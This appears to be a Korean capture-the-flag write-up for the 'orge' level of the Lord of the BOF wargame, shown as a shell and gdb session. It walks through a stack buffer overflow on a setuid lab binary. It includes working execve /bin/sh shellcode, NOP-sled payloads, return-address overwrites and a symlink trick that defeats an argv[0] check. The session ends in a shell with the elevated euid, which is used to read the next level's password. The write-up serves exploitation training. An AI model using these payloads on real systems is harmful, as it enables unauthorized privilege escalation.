http://www.hackerschool.org/HS_Boards/zboard.php?AllArticle=true&no=8609 [복사]
[darkelf@localhost darkelf]$ bash2
[darkelf@localhost darkelf]$ ls -al
total 48
drwx------ 2 darkelf darkelf 4096 Mar 30 2010 .
drwxr-xr-x 25 root root 4096 Mar 30 2010 ..
-rw-r--r-- 1 darkelf darkelf 24 Feb 26 2010 .bash_logout
-rw-r--r-- 1 darkelf darkelf 230 Feb 26 2010 .bash_profile
-rw-r--r-- 1 darkelf darkelf 124 Feb 26 2010 .bashrc
-rwxr-xr-x 1 darkelf darkelf 333 Feb 26 2010 .emacs
-rw-r--r-- 1 darkelf darkelf 3394 Feb 26 2010 .screenrc
-rwsr-sr-x 1 orge orge 12700 Mar 1 2010 orge
-rw-r--r-- 1 root root 800 Mar 29 2010 orge.c
[darkelf@localhost darkelf]$ cat orge.c
/*
The Lord of the BOF : The Fellowship of the BOF
- orge
- check argv[0]
*/
#include <stdio.h>
#include <stdlib.h>
extern char **environ;
/*
 * Deliberately vulnerable training target ("orge"): argv[1] is copied into a
 * 40-byte stack buffer after a length check that admits 48 bytes.  Per the
 * disassembly reproduced on this page, buffer lives at ebp-40, so 48 bytes
 * cover the buffer, the saved ebp and the 4-byte return address.
 *
 * Note: strlen/strcpy/memset are used without #include <string.h>, and main
 * is declared with an implicit int return type (old-style C).
 */
main(int argc, char *argv[])
{
  char buffer[40];   /* destination of the unbounded strcpy below */
  int i;
  if(argc < 2){
    printf("argv error\n");
    exit(0);
  }
  // here is changed!
  // argv[0] must be exactly 77 characters.  argv[0] is whatever name the
  // program was invoked under, which the caller controls (the session on
  // this page satisfies it with a symlink of the required length), so this
  // check is not an access control, only an inconvenience.
  if(strlen(argv[0]) != 77){
    printf("argv[0] error\n");
    exit(0);
  }
  // egghunter
  // Zero every environment string so nothing caller-supplied survives in
  // the environment.  Only environ is wiped; argv[1], argv[2], ... are left
  // intact on the stack.
  for(i=0; environ[i]; i++)
    memset(environ[i], 0, strlen(environ[i]));
  // Byte 47 of argv[1] -- the high byte of the 4-byte return-address slot at
  // buffer offset 44..47 -- must be 0xbf.  This index is read before the
  // length check below, so a shorter argv[1] is read past its terminator.
  if(argv[1][47] != '\xbf')
  {
    printf("stack is still your friend.\n");
    exit(0);
  }
  // check the length of argument
  // Allows up to 48 bytes into a 40-byte buffer: the bound is 8 bytes too
  // generous.  A bounded copy (e.g. limited to sizeof(buffer)-1) would close
  // the overflow.
  if(strlen(argv[1]) > 48){
    printf("argument is too long!\n");
    exit(0);
  }
  strcpy(buffer, argv[1]);   /* unbounded copy: the overflow */
  printf("%s\n", buffer);
  // buffer hunter
  // Wipes the buffer after use, so the copied bytes are gone before main
  // returns; the saved ebp / return address overwritten by the strcpy above
  // are not restored by this.
  memset(buffer, 0, 40);
}
소스 코드를 cat으로 출력하자면 argv[0]는 파일 이름을 의미한다.
파일 이름의 길이가 77이 아닐 경우 if문에 들어가 exit함수의 호출로
프로그램이 종료된다.
그렇다면 파일의 이름을 변경해야 되는데
공략할 대상 프로그램의 권한이 없으니 이름을 변경할 수 없다.
한가지 방법이 있다면 링크를 걸면 된다.
----------------------------------------------------
심볼릭링크 (Symbolic Link)
단순히 원본파일을 가리키도록 링크만 시켜둔 것으로
MS의 윈도우시스템에서 흔히 사용하는 '바로가기' 같은 것이며,
원본파일을 가리키고만 있으므로 원본파일의 크기와는 무관하다.
그리고 심볼릭링크에서는 원본파일이 삭제되어 존재하지 않을 경우에
링크파일은 깜박거리면서 링크파일의 원본파일이 없다는 것을 알려준다.
----------------------------------------------------
하드링크 (Hard Link)
원본파일과 다른 이름으로 존재하는 동일한 파일이며
원본파일과 동일한 내용의 다른 파일이라고 할 수 있다.
그리고 하드링크에서는 원본파일과 링크파일
두개가 서로 다른 파일이기 때문에
둘 중 하나를 삭제하더라도 나머지 하나는 그대로 남아 있다.
또한 하드링크에서는 원본파일의 내용이 변경될 경우에는
링크파일의 내용 또한 자동으로 변경된다.
사용법 : ln [옵션] 원본파일 대상파일(대상디렉토리)
출처: https://webdir.tistory.com/148 [WEBDIR:티스토리]
----------------------------------------------------
[darkelf@localhost darkelf]$ mkdir tmp
[darkelf@localhost darkelf]$ ls
orge orge.c tmp
[darkelf@localhost darkelf]$ cp orge tmp
[darkelf@localhost darkelf]$ cd ls
bash2: cd: ls: No such file or directory
[darkelf@localhost darkelf]$ ls
orge orge.c tmp
[darkelf@localhost darkelf]$ cd tmp
[darkelf@localhost tmp]$ ls
orge
[darkelf@localhost tmp]$ pwd
/home/darkelf/tmp
[darkelf@localhost tmp]$ ln -s orge `python -c 'print "A"*59'`
여기서 우리는 pwd를 이용해 위치경로를 파악하고
argv[0]의 길이가 77이 성립되어야
if문에 진입하지 않고 다음 코드로 넘어간다.
그래서 최종적으로 파일 이름은...
/home/darkelf/tmp/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
시간이 남아돌고 할 일 없으면 세어봐도 무방하다.
77개다.
[darkelf@localhost tmp]$ ls -al
total 24
drwxrwxr-x 2 darkelf darkelf 4096 Jul 7 01:10 .
drwx------ 3 darkelf darkelf 4096 Jul 7 01:05 ..
lrwxrwxrwx 1 darkelf darkelf 4 Jul 7 01:10 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA -> orge
-rwsr-sr-x 1 darkelf darkelf 12700 Jul 7 01:05 orge
[darkelf@localhost tmp]$ gdb -q `python -c 'print "A"*59'`
(gdb) set disassembly intel
(gdb) disas main
Dump of assembler code for function main:
0x8048500 <main>: push %ebp
0x8048501 <main+1>: mov %ebp,%esp
0x8048503 <main+3>: sub %esp,44
0x8048506 <main+6>: cmp DWORD PTR [%ebp+8],1
0x804850a <main+10>: jg 0x8048523 <main+35>
0x804850c <main+12>: push 0x8048690
0x8048511 <main+17>: call 0x8048410 <printf>
0x8048516 <main+22>: add %esp,4
0x8048519 <main+25>: push 0
0x804851b <main+27>: call 0x8048420 <exit>
0x8048520 <main+32>: add %esp,4
0x8048523 <main+35>: mov %eax,DWORD PTR [%ebp+12]
0x8048526 <main+38>: mov %edx,DWORD PTR [%eax]
0x8048528 <main+40>: push %edx
0x8048529 <main+41>: call 0x80483f0 <strlen>
0x804852e <main+46>: add %esp,4
0x8048531 <main+49>: mov %eax,%eax
0x8048533 <main+51>: cmp %eax,77
0x8048536 <main+54>: je 0x8048550 <main+80>
0x8048538 <main+56>: push 0x804869c
0x804853d <main+61>: call 0x8048410 <printf>
0x8048542 <main+66>: add %esp,4
0x8048545 <main+69>: push 0
0x8048547 <main+71>: call 0x8048420 <exit>
0x804854c <main+76>: add %esp,4
0x804854f <main+79>: nop
0x8048550 <main+80>: nop
0x8048551 <main+81>: mov DWORD PTR [%ebp-44],0x0
0x8048558 <main+88>: mov %eax,DWORD PTR [%ebp-44]
0x804855b <main+91>: lea %edx,[%eax*4]
0x8048562 <main+98>: mov %eax,%ds:0x80497d4
0x8048567 <main+103>: cmp DWORD PTR [%eax+%edx],0
0x804856b <main+107>: jne 0x8048570 <main+112>
0x804856d <main+109>: jmp 0x80485b0 <main+176>
0x804856f <main+111>: nop
0x8048570 <main+112>: mov %eax,DWORD PTR [%ebp-44]
0x8048573 <main+115>: lea %edx,[%eax*4]
0x804857a <main+122>: mov %eax,%ds:0x80497d4
0x804857f <main+127>: mov %edx,DWORD PTR [%eax+%edx]
0x8048582 <main+130>: push %edx
0x8048583 <main+131>: call 0x80483f0 <strlen>
0x8048588 <main+136>: add %esp,4
0x804858b <main+139>: mov %eax,%eax
0x804858d <main+141>: push %eax
0x804858e <main+142>: push 0
0x8048590 <main+144>: mov %eax,DWORD PTR [%ebp-44]
0x8048593 <main+147>: lea %edx,[%eax*4]
0x804859a <main+154>: mov %eax,%ds:0x80497d4
0x804859f <main+159>: mov %edx,DWORD PTR [%eax+%edx]
0x80485a2 <main+162>: push %edx
---Type <return> to continue, or q <return> to quit---
0x80485a3 <main+163>: call 0x8048430 <memset>
0x80485a8 <main+168>: add %esp,12
0x80485ab <main+171>: inc DWORD PTR [%ebp-44]
0x80485ae <main+174>: jmp 0x8048558 <main+88>
0x80485b0 <main+176>: mov %eax,DWORD PTR [%ebp+12]
0x80485b3 <main+179>: add %eax,4
0x80485b6 <main+182>: mov %edx,DWORD PTR [%eax]
0x80485b8 <main+184>: add %edx,47
0x80485bb <main+187>: cmp BYTE PTR [%edx],0xbf
0x80485be <main+190>: je 0x80485d7 <main+215>
0x80485c0 <main+192>: push 0x80486ab
0x80485c5 <main+197>: call 0x8048410 <printf>
0x80485ca <main+202>: add %esp,4
0x80485cd <main+205>: push 0
0x80485cf <main+207>: call 0x8048420 <exit>
0x80485d4 <main+212>: add %esp,4
0x80485d7 <main+215>: mov %eax,DWORD PTR [%ebp+12]
0x80485da <main+218>: add %eax,4
0x80485dd <main+221>: mov %edx,DWORD PTR [%eax]
0x80485df <main+223>: push %edx
0x80485e0 <main+224>: call 0x80483f0 <strlen>
0x80485e5 <main+229>: add %esp,4
0x80485e8 <main+232>: mov %eax,%eax
0x80485ea <main+234>: cmp %eax,48
0x80485ed <main+237>: jbe 0x8048606 <main+262>
0x80485ef <main+239>: push 0x80486c8
0x80485f4 <main+244>: call 0x8048410 <printf>
0x80485f9 <main+249>: add %esp,4
0x80485fc <main+252>: push 0
0x80485fe <main+254>: call 0x8048420 <exit>
0x8048603 <main+259>: add %esp,4
0x8048606 <main+262>: mov %eax,DWORD PTR [%ebp+12]
0x8048609 <main+265>: add %eax,4
0x804860c <main+268>: mov %edx,DWORD PTR [%eax]
0x804860e <main+270>: push %edx
0x804860f <main+271>: lea %eax,[%ebp-40]
0x8048612 <main+274>: push %eax
0x8048613 <main+275>: call 0x8048440 <strcpy>
0x8048618 <main+280>: add %esp,8
0x804861b <main+283>: lea %eax,[%ebp-40]
0x804861e <main+286>: push %eax
0x804861f <main+287>: push 0x80486df
0x8048624 <main+292>: call 0x8048410 <printf>
0x8048629 <main+297>: add %esp,8
0x804862c <main+300>: push 40
0x804862e <main+302>: push 0
0x8048630 <main+304>: lea %eax,[%ebp-40]
0x8048633 <main+307>: push %eax
0x8048634 <main+308>: call 0x8048430 <memset>
0x8048639 <main+313>: add %esp,12
0x804863c <main+316>: leave
---Type <return> to continue, or q <return> to quit---
0x804863d <main+317>: ret
0x804863e <main+318>: nop
0x804863f <main+319>: nop
End of assembler dump.
(gdb) b *main+275
Breakpoint 1 at 0x8048613
(gdb) r `python -c 'print "B"*44+"\xbf"*4'` `python -c 'print "\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`
Starting program: /home/darkelf/tmp/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA `python -c 'print "B"*44+"\xbf"*4'` `python -c 'print "\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`
Breakpoint 1, 0x8048613 in main ()
(gdb) x/512x $esp
0xbffff984: 0xbffff990 0xbffffb59 0x00000017 0xbffff9b8
0xbffff994: 0x4000a970 0x400f855b 0x08049704 0x4000ae60
0xbffff9a4: 0xbffffa04 0xbffff9b8 0x080484eb 0x080496f0
0xbffff9b4: 0x08049704 0xbffff9d8 0x400309cb 0x00000003
0xbffff9c4: 0xbffffa04 0xbffffa14 0x40013868 0x00000003
0xbffff9d4: 0x08048450 0x00000000 0x08048471 0x08048500
0xbffff9e4: 0x00000003 0xbffffa04 0x08048390 0x0804866c
0xbffff9f4: 0x4000ae60 0xbffff9fc 0x40013e90 0x00000003
0xbffffa04: 0xbffffb0b 0xbffffb59 0xbffffb8a 0x00000000
0xbffffa14: 0xbffffc08 0xbffffc2a 0xbffffc34 0xbffffc42
0xbffffa24: 0xbffffc61 0xbffffc71 0xbffffc88 0xbffffca5
0xbffffa34: 0xbffffcc4 0xbffffccf 0xbffffcdd 0xbffffd20
0xbffffa44: 0xbffffd35 0xbffffd48 0xbffffd5d 0xbffffd6d
0xbffffa54: 0xbffffd7a 0xbffffd99 0xbffffdb1 0xbffffdbc
0xbffffa64: 0xbffffdcd 0xbffffde3 0xbffffdeb 0x00000000
0xbffffa74: 0x00000003 0x08048034 0x00000004 0x00000020
0xbffffa84: 0x00000005 0x00000006 0x00000006 0x00001000
0xbffffa94: 0x00000007 0x40000000 0x00000008 0x00000000
0xbffffaa4: 0x00000009 0x08048450 0x0000000b 0x000001fa
0xbffffab4: 0x0000000c 0x000001fa 0x0000000d 0x000001fa
0xbffffac4: 0x0000000e 0x000001fa 0x00000010 0x0febfbff
0xbffffad4: 0x0000000f 0xbffffb06 0x00000000 0x00000000
0xbffffae4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffaf4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb04: 0x36690000 0x2f003638 0x656d6f68 0x7261642f
0xbffffb14: 0x666c656b 0x706d742f 0x4141412f 0x41414141
0xbffffb24: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffb34: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffb44: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffb54: 0x41414141 0x42424200 0x42424242 0x42424242
0xbffffb64: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffffb74: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffffb84: 0xbfbfbf42 0x909000bf 0x90909090 0x90909090
0xbffffb94: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffba4: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffbb4: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffbc4: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffbd4: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffbe4: 0x90909090 0x90909090 0xc0319090 0x2f2f6850
0xbffffbf4: 0x2f686873 0x896e6962 0x895350e3 0xb0d231e1
0xbffffc04: 0x0080cd0b 0x00000000 0x00000000 0x00000000
0xbffffc14: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc24: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc34: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc44: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc54: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc64: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc74: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc84: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc94: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffca4: 0x00000000 0x00000000 0x00000000 0x00000000
---Type <return> to continue, or q <return> to quit---
0xbffffcb4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcc4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcd4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffce4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcf4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd04: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd14: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd24: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd34: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd44: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd54: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd64: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd74: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd84: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd94: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffda4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffdb4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffdc4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffdd4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffde4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffdf4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe04: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe14: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe24: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe34: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe44: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe54: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe64: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe74: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe84: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe94: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffea4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffeb4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffec4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffed4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffee4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffef4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff04: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff14: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff24: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff34: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff44: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff54: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff64: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff74: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff84: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff94: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffffa4: 0x00000000 0x00000000 0x682f0000 0x2f656d6f
0xbfffffb4: 0x6b726164 0x2f666c65 0x2f706d74 0x41414141
0xbfffffc4: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffffd4: 0x41414141 0x41414141 0x41414141 0x41414141
---Type <return> to continue, or q <return> to quit---
0xbfffffe4: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffff4: 0x41414141 0x00414141 0x00000000 Cannot access memory at address 0xc0000000
(gdb) q
The program is running. Exit anyway? (y or n) y
[darkelf@localhost tmp]$ cd ..
[darkelf@localhost darkelf]$ pwd
/home/darkelf
[darkelf@localhost darkelf]$ ln -s orge `python -c 'print "A"*63'`
[darkelf@localhost darkelf]$ ls
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA orge orge.c tmp
[darkelf@localhost darkelf]$ ./`python -c 'print "A"*63'`
argv error
[darkelf@localhost darkelf]$ ls -al
total 52
drwx------ 3 darkelf darkelf 4096 Jul 7 01:13 .
drwxr-xr-x 25 root root 4096 Mar 30 2010 ..
-rw-r--r-- 1 darkelf darkelf 24 Feb 26 2010 .bash_logout
-rw-r--r-- 1 darkelf darkelf 230 Feb 26 2010 .bash_profile
-rw-r--r-- 1 darkelf darkelf 124 Feb 26 2010 .bashrc
-rwxr-xr-x 1 darkelf darkelf 333 Feb 26 2010 .emacs
-rw-r--r-- 1 darkelf darkelf 3394 Feb 26 2010 .screenrc
lrwxrwxrwx 1 darkelf darkelf 4 Jul 7 01:13 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA -> orge
-rwsr-sr-x 1 orge orge 12700 Mar 1 2010 orge
-rw-r--r-- 1 root root 800 Mar 29 2010 orge.c
drwxrwxr-x 2 darkelf darkelf 4096 Jul 7 01:10 tmp
[darkelf@localhost darkelf]$ ./`python -c 'print "A"*63'` `python -c 'print "\x90"*44+"\xb4\xfb\xff\xbf"'` `python -c 'print "\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`
argv[0] error
[darkelf@localhost darkelf]$ ln -s orge `python -c 'print "A"*75'`
[darkelf@localhost darkelf]$ ./`python -c 'print "A"*75'` `python -c 'print "\x90"*44+"\xb4\xfb\xff\xbf"'` `python -c 'print "\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`
¢¥
Segmentation fault
[darkelf@localhost darkelf]$ ls
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA orge orge.c tmp
[darkelf@localhost darkelf]$ cd tmp
[darkelf@localhost tmp]$ ls
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA orge
[darkelf@localhost tmp]$ ./`python -c 'print "A"*59'` `python -c 'print "\x90"*44+"\xb4\xfb\xff\xbf"'` `python -c 'print "\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`
argv[0] error
[darkelf@localhost tmp]$ ln -s orge `python -c 'prrint "A"*75'`
File "<string>", line 1
prrint "A"*75
^
SyntaxError: invalid syntax
ln: ./orge: File exists
[darkelf@localhost tmp]$ ls
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA orge
[darkelf@localhost tmp]$ ./`python -c 'print "A"*75'` `python -c 'print "\x90"*44+"\xb4\xfb\xff\xbf"'` `python -c 'print "\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`
bash2: ./AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA: No such file or directory
[darkelf@localhost tmp]$ ln -s orge `python -c 'print "B"*75'`
[darkelf@localhost tmp]$ ls
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB orge
[darkelf@localhost tmp]$ ./`python -c 'print "B"*75'` `python -c 'print "\x90"*44+"\xb4\xfb\xff\xbf"'` `python -c 'print "\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`
¢¥
Segmentation fault (core dumped)
[darkelf@localhost tmp]$ ls
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB core orge
[darkelf@localhost tmp]$ gdb -q -c core
Core was generated by `./BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB '.
Program terminated with signal 11, Segmentation fault.
#0 0xbfffffad in ?? ()
(gdb) x/200x $esp
0xbffff970: 0x00000000 0xbffff9b4 0xbffff9c4 0x40013868
0xbffff980: 0x00000003 0x08048450 0x00000000 0x08048471
0xbffff990: 0x08048500 0x00000003 0xbffff9b4 0x08048390
0xbffff9a0: 0x0804866c 0x4000ae60 0xbffff9ac 0x40013e90
0xbffff9b0: 0x00000003 0xbffffabb 0xbffffb09 0xbffffb3a
0xbffff9c0: 0x00000000 0xbffffbb8 0xbffffbce 0xbffffbe5
0xbffff9d0: 0xbffffc04 0xbffffc26 0xbffffc33 0xbffffdf6
0xbffff9e0: 0xbffffe15 0xbffffe32 0xbffffe47 0xbffffe66
0xbffff9f0: 0xbffffe71 0xbffffe89 0xbffffe99 0xbffffea1
0xbffffa00: 0xbffffeab 0xbffffebb 0xbffffec9 0xbffffed7
0xbffffa10: 0xbffffee8 0xbffffef3 0xbfffff06 0xbfffff49
0xbffffa20: 0xbfffff99 0x00000000 0x00000003 0x08048034
0xbffffa30: 0x00000004 0x00000020 0x00000005 0x00000006
0xbffffa40: 0x00000006 0x00001000 0x00000007 0x40000000
0xbffffa50: 0x00000008 0x00000000 0x00000009 0x08048450
0xbffffa60: 0x0000000b 0x000001fa 0x0000000c 0x000001fa
0xbffffa70: 0x0000000d 0x000001fa 0x0000000e 0x000001fa
0xbffffa80: 0x00000010 0x0febfbff 0x0000000f 0xbffffab6
0xbffffa90: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffaa0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffab0: 0x00000000 0x36690000 0x2e003638 0x4242422f
0xbffffac0: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffffad0: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffffae0: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffffaf0: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffffb00: 0x42424242 0x42424242 0x90909000 0x90909090
0xbffffb10: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb20: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb30: 0x90909090 0xfffbb490 0x909000bf 0x90909090
0xbffffb40: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb50: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb60: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb70: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb80: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb90: 0x90909090 0x90909090 0x90909090 0xc0319090
0xbffffba0: 0x2f2f6850 0x2f686873 0x896e6962 0x895350e3
0xbffffbb0: 0xb0d231e1 0x0080cd0b 0x00000000 0x00000000
0xbffffbc0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbd0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbe0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbf0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc00: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc10: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc20: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc30: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc40: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc50: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc60: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc70: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc80: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb) exit
Undefined command: "exit". Try "help".
(gdb) q
[darkelf@localhost tmp]$ cd ..
[darkelf@localhost darkelf]$ ./`python -c 'print "A"*75'` `python -c 'print "\x90"*44+"\x50\xfb\xff\xbf"'` `python -c 'print "\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`
P
bash$ id
uid=506(darkelf) gid=506(darkelf) euid=507(orge) egid=507(orge) groups=506(darkelf)
bash$ my-pass
euid = 507
[??????????????]
bash$
최종적으로...
gdb로 디버깅할 땐, pwd로 출력된 절대경로까지 포함된 이름과
파일 이름을 비교하는데 gdb가 아닌
그냥 실행할 경우 pwd가 포함이 되지 않는다.